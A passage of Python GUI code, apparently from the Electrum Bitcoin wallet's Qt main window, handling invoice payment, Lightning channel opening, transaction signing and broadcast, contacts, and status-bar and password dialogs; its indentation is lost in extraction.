buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs, payjoin=invoice.bip78_payjoin)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
payjoin=None,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs,
payjoin=payjoin)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs,
payjoin=payjoin)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None, payjoin=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self, payjoin=payjoin)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def send_http_request(self, method, url, **kwargs):
return self.network.send_http_on_proxy(method, url, **kwargs)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_bip21_uri(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
self.set_payjoin_availability(self.payto_URI)
def set_payjoin_availability(self, out):
""" """
pj = out.get('pj')
pjos = out.get('pjos')
if pj:
self.pj_available = True
self.pj = pj
self.pjos = pjos
else:
self.pj_available = False
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
self.pj_available = False
self.pj = None
self.pjos = None
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
